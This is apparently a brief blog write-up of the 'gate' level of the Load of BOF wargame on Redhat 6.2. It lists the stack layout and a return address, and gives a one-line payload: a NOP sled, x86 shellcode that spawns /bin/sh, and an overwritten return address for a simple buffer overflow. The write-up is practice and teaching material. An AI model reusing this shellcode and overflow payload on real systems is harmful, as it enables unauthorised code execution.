Wargames/Load Of BOF

LOB Redhat 6.2 - gate

5unKn0wn 2015. 10. 22. 22:25


gate - simple BOF

Stack : buffer[256] + sfp[4] + ret[4]

return address : 0xbffff928

Payload : ./gremlin `python -c 'print "\x90"*137 + "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80" + "\x90"*100 + "\x28\xf9\xff\xbf"'`


Using buffer address